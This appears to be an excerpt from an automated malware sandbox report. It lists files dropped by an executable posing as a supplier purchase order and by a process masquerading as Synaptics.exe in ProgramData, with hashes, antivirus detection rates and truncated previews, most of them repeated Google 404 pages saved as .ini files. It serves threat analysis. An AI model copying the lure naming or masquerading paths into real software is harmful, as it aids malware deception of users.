                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..............................................@..............................B*......0....................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...0...........................@..P....................................@..P........................................................................................................................................

                                                                                                                                C:\ProgramData\Synaptics\Synaptics.exe:Zone.Identifier

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):26
                                                                                                                                Entropy (8bit):3.95006375643621
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                Malicious:true
                                                                                                                                Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                C:\Users\user\AppData\Local\Temp\4aWFzvG.ini

                                                                                                                                Download File
                                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1652
                                                                                                                                Entropy (8bit):5.266024945068794
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:GgsF+04v0SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+f0+pAZewRDK4mW
                                                                                                                                MD5:F0F52BEBF1D0EB05BEDD557B91D5BA90
                                                                                                                                SHA1:A91FE63DBB45E06E5DA975D0A49DA5FA18CAF143
                                                                                                                                SHA-256:D2B190369ADA9AF79489BA9BE6A5897ED1ECEDBDBA18E8A0F9DF7FF0017EC83D
                                                                                                                                SHA-512:BCCCF8951329F3863AC5BAAFCFAD28ECEC70BBEE1F8BB59270C5E8505E8C700AFA6479E26F17A3214D214BC24A11DE0D841BDDD7688B39A044B7A42366B262D6
                                                                                                                                Malicious:false
                                                                                                                                Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="9dRJ9c_3_d9cP2zIV4DW3g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                C:\Users\user\AppData\Local\Temp\AlspkRS.ini

                                                                                                                                Download File
                                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1652
                                                                                                                                Entropy (8bit):5.253720510294435
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:GgsF+0JIzSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+dz+pAZewRDK4mW
                                                                                                                                MD5:ADFAAEE39DFD6C8E824BB1206BB5934A
                                                                                                                                SHA1:930AB92E0932F691FF0EFDDD32793BA214C25F65
                                                                                                                                SHA-256:F7E6560D8107B37A67D31561945E921D9856D8252A87B8433A01E3A4E650407D
                                                                                                                                SHA-512:17FECC1B7E4F021E51305AD1B67CBB9FF8D246F759E7AFB1A7C21660BE31A0BAF1C843E4664F14A2E3CFE662DB3BFFEB9BCA45105B4CAFE1AC9632063B044CA8
                                                                                                                                Malicious:false
                                                                                                                                Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ovq8vn_m_npslSqd859XBQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                C:\Users\user\AppData\Local\Temp\BwuqBhL.ini

                                                                                                                                Download File
                                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1652
                                                                                                                                Entropy (8bit):5.266764521872147
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:GgsF+0FUZXSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+hV+pAZewRDK4mW
                                                                                                                                MD5:BC02B0605BEBD914F3E10B1B4CCB4F90
                                                                                                                                SHA1:FA709F9F8FC7BCD211F51C2800BFAAC25C183F78
                                                                                                                                SHA-256:51FFC0A0E1AB77C1C74E8CAE6F089E259799E9583A128079EC549E7692BA95B6
                                                                                                                                SHA-512:F3C15625C4B8C2720D70ADC0439C65C8874889243D6EBF612F4BC640184F1B87DA67F5FEF377A7AA7104BCB7B1F5CF7F5347FB4893123794E9356FF07435D4D1
                                                                                                                                Malicious:false
                                                                                                                                Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="FVHbTkYvcRKJuArgaAZrmQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                C:\Users\user\AppData\Local\Temp\C6zC7px.ini

                                                                                                                                Download File
                                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1652
                                                                                                                                Entropy (8bit):5.259313372465236
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:GgsF+0J6SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+W6+pAZewRDK4mW
                                                                                                                                MD5:90868BA64AC999A183477802BAF6BFBA
                                                                                                                                SHA1:C72B147A1917FE2A040976393DC7060F95D45314
                                                                                                                                SHA-256:EAFC5A2CD2ED6B7D6A0FA30EE9F291BF842C04D79E12E381BC834530723E86A9
                                                                                                                                SHA-512:9CF4D92DD7093FBAFE91922452D12646EC9B4691B0C51BF3855A4DAF420176D122D29DF5B3541E9AD87CE8691B6A962E6E41F11763420EC44A3AFAB93652535F
                                                                                                                                Malicious:false
                                                                                                                                Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="9HrVOhBr_7rwQFdXzdh2Lw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                C:\Users\user\AppData\Local\Temp\CWZLieQ.ini

                                                                                                                                Download File
                                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1652
                                                                                                                                Entropy (8bit):5.269430840877484
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:GgsF+0u3SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Z3+pAZewRDK4mW
                                                                                                                                MD5:D3758A9FD698C118B3390BE5B1C4A790
                                                                                                                                SHA1:76396CC185D8E739A883B1719B1ADF5BC0A4A7B5
                                                                                                                                SHA-256:20336060469E026B7E6C1DB65BC5DD903E08574B62C1B7282D6DC5FE5C1AEFC1
                                                                                                                                SHA-512:3CAB8B2282FBEFD884881FC12AA749700D707C5D38FC5EC3CDE7A90CFFD654A4F2A45DC09818C2121993BD754F0D5CC6551926C38129B24EB7A894B0C889AD12
                                                                                                                                Malicious:false
                                                                                                                                Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="kg4bYPLhWYnk2ARQ_KX9wQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                C:\Users\user\AppData\Local\Temp\ExL2BsMQ.xlsm

                                                                                                                                Download File
                                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                File Type:Microsoft Excel 2007+
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):18387
                                                                                                                                Entropy (8bit):7.523057953697544
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                                                                MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                                                                SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                                                                SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                                                                SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                                                                Malicious:false
                                                                                                                                Preview:PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-*c.{...dT.m.kL]Yj.|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd*...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............

                                                                                                                                C:\Users\user\AppData\Local\Temp\F8cO3Tb.ini

                                                                                                                                Download File
                                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1652
                                                                                                                                Entropy (8bit):5.2673668674046015
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:GgsF+03SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+w+pAZewRDK4mW
                                                                                                                                MD5:DF467707BDB19CF1B3588EC87DEABC29
                                                                                                                                SHA1:3E77F78CC280B6C230CBE1FFA947DCFB97426412
                                                                                                                                SHA-256:BA30462031CB8A782C03C3DCAF2D093898E539BD6453CEBDC7B3621DA389675E
                                                                                                                                SHA-512:F6D090AA412FC1F28C48BD6A5D5FB6DBAD5C4213534F74440A0EF360EBDAFEA30D8B4CFBF536D1A723A94B2A6EA197180844120CBB5A1571EEEAFC5BF80754BB
                                                                                                                                Malicious:false
                                                                                                                                Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="H2q1wYKHC-VFNGaXCdcSow">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                C:\Users\user\AppData\Local\Temp\FlVeOEl.ini

                                                                                                                                Download File
                                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1652
                                                                                                                                Entropy (8bit):5.270320893930298
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:GgsF+0gSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+z+pAZewRDK4mW
                                                                                                                                MD5:B9C79B6F73C663D635E8D901A464869F
                                                                                                                                SHA1:648CA65ABC79C8B9233CBDE620E1970A51616979
                                                                                                                                SHA-256:2AD37FCE12324AB5C7D56E47B6927F092520489771B8B7E90E78A19EF4517A46
                                                                                                                                SHA-512:F4A88E4B87AD9014AAE53FF72BA138F2806154F62C40C45F968FAE091340926A3EA3A0B7B92E0E3867FDCADA243010D3459191C6CF25F96CD04271D3D9C40CD0
                                                                                                                                Malicious:false
                                                                                                                                Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="JZbI6I8XEMYOT2a14M7img">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                C:\Users\user\AppData\Local\Temp\H7u3heD.ini

                                                                                                                                Download File
                                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1652
                                                                                                                                Entropy (8bit):5.268532009428551
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:GgsF+02SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+J+pAZewRDK4mW
                                                                                                                                MD5:D650ACFA8EC6F228B766E0404B355322
                                                                                                                                SHA1:70588F896D48302674F89291848E984DC880FD41
                                                                                                                                SHA-256:C08A0F6A34C150314231100816E2BDAB855D9892379AAADAD896DB3D95AFBD3D
                                                                                                                                SHA-512:C6C2A407A04C02E85098F180BB4B97BCCF7B242C5F30A5AB89ACDF60122EF2163EE24702FBAF53B4F7C5B59EED7392C4A6CA8EFB25CC3AEA72AD183F0ACE4B22
                                                                                                                                Malicious:false
                                                                                                                                Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="nEKiPLz6bUV0ARsU9L_96g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                C:\Users\user\AppData\Local\Temp\HFPdba3.ini

                                                                                                                                Download File
                                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1652
                                                                                                                                Entropy (8bit):5.266916735963596
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:GgsF+0vfP3SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+U+pAZewRDK4mW
                                                                                                                                MD5:94F4B644FC20F7156DC6FBB6EAB98CE7
                                                                                                                                SHA1:7A6C90C0C7B16CAC20B81E8C9CED10625BE48241
                                                                                                                                SHA-256:A8A0565322CE2D5F91B4FE46E067A2F7A2E555E8ADC57ACB3DD99F0E3C85849C
                                                                                                                                SHA-512:B29AE55DC3282E0E3F0C908636E16BDEBB59EBD47D03417E2584FEDE4DBDAD291B30393930ABED786059E9E321E4C98590890D1E1C9554DEB2D555469CC8BD75
                                                                                                                                Malicious:false
                                                                                                                                Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="C_nJqSua5vS6I0t8CZrBEw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                C:\Users\user\AppData\Local\Temp\IosO5Bk.ini

                                                                                                                                Download File
                                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1652
                                                                                                                                Entropy (8bit):5.279469425016549
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:GgsF+0cBESU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+dBE+pAZewRDK4mW
                                                                                                                                MD5:5CC0102B6FC06763DA0F77FC71C49D5E
                                                                                                                                SHA1:9472E44AB7788798395BEAAC8C336687C6593F67
                                                                                                                                SHA-256:5B19EC09BDA1C78E80B65F0A77FB9AA63D601F8063D80994CD6DDCAECA8A6335
                                                                                                                                SHA-512:A9FA85C8B112CED465F0E327F6B2DBC3FC11FC7A7FE94DF37DF24BB539369FA07FA0A034D8E4ACE991AAA460E4C9D3484C05575922E3AE76B5BCA15F4ACAF8F1
                                                                                                                                Malicious:false
                                                                                                                                Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="zkMtRYPBQvM_DEmC4IzxMA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                C:\Users\user\AppData\Local\Temp\JWubeJt.ini

                                                                                                                                Download File
                                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1652
                                                                                                                                Entropy (8bit):5.255768344641617
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:GgsF+0ROSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+r+pAZewRDK4mW
                                                                                                                                MD5:D6F34690512671DD7F32067967C8E88B
                                                                                                                                SHA1:D7C1D9394283D09A0AE2314AB359AB776547C074
                                                                                                                                SHA-256:8526BF6BCAA48CBF9C1C80ABE54AED2BB4E6432E8B29DAAB9CA6EFCB43DF0FCF
                                                                                                                                SHA-512:5CC7E1EEE20A650E5FE9DD1D9B5E0943636E74FE5501C01577941E770922F3B53C1E5F8B9745B26EA123B6D5C92CE449A9C2204B0626C261DCEF164C4EEC0014
                                                                                                                                Malicious:false
                                                                                                                                Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="H4qYoOdWkqySFtEkxscarw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                C:\Users\user\AppData\Local\Temp\OjYQTcv.ini

                                                                                                                                Download File
                                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1652
                                                                                                                                Entropy (8bit):5.267622395812817
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:GgsF+0XSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Y+pAZewRDK4mW
                                                                                                                                MD5:0568E1BA4CF633346EFE3A6B13E0BB7F
                                                                                                                                SHA1:3CF9E301191924423CA6392912B69938E357AE6B
                                                                                                                                SHA-256:47785D5EED4C1E3EACC61B04B81CAFF4EE1B101DD8FC04FAD2FBD0F00AD5DD05
                                                                                                                                SHA-512:2E6636F32570045FB4ADA8F3FB9EAB5A89A3F91F47B1F8081CBCDB13EE4DEF733198338D3E4D2E4701F124330176B4EA458DED3A51FE86BC884C17BF09982846
                                                                                                                                Malicious:false
                                                                                                                                Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="N5JHt0j5yW0B9oATw6n7FQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                                                                C:\Users\user\AppData\Local\Temp\PhFjRSA.ini

                                                                                                                                Download File
                                                                                                                                Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1652
                                                                                                                                Entropy (8bit):5.271301677933788
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:GgsF+01TSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+cT+pAZewRDK4mW
                                                                                                                                MD5:92FBC0B5A4A3FD391253B32FE47461AD
                                                                                                                                SHA1:FE24538A1A71D5949D6D9CD6EA3E81232BADF766
                                                                                                                                SHA-256:D7D767BD352A9AF756D4F8CA797EFE287E4F8B0B03D5D6C92205280BF2EA4511
                                                                                                                                SHA-512:E046511FC9822771DAD5511DC84BE0F9592DD91480CD7D5D46A9DA6123F4688CCA77B66752798E8F2FEEDB9C7408BBE1AB44C679B08398E630C36C366BC6EB97
                                                                                                                                Malicious:false
                                                                                                                                Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="BJ4dhzLsXFZ96UbLzct4CQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

